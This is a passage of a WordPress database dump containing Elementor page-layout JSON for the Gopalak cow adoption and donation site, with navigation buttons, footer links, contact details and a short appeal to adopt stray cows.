alak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by\\u00a0<a href=\\\"https:\\/\\/themehunk.com\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Themehunk<\\/a><\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#020202\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12293,2016,'_elementor_page_assets','a:0:{}'),(12296,2017,'_elementor_edit_mode','builder'),(12297,2017,'_elementor_template_type','wp-page'),(12298,2017,'_elementor_version','3.7.8'),(12299,2017,'_wp_page_template','elementor_canvas'),(12300,2017,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12301,2017,'_elementor_page_assets','a:0:{}'),(12303,2018,'_elementor_edit_mode','builder'),(12304,2018,'_elementor_template_type','wp-page'),(12305,2018,'_elementor_version','3.7.8'),(12306,2018,'_wp_page_template','elementor_canvas'),(12307,2018,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/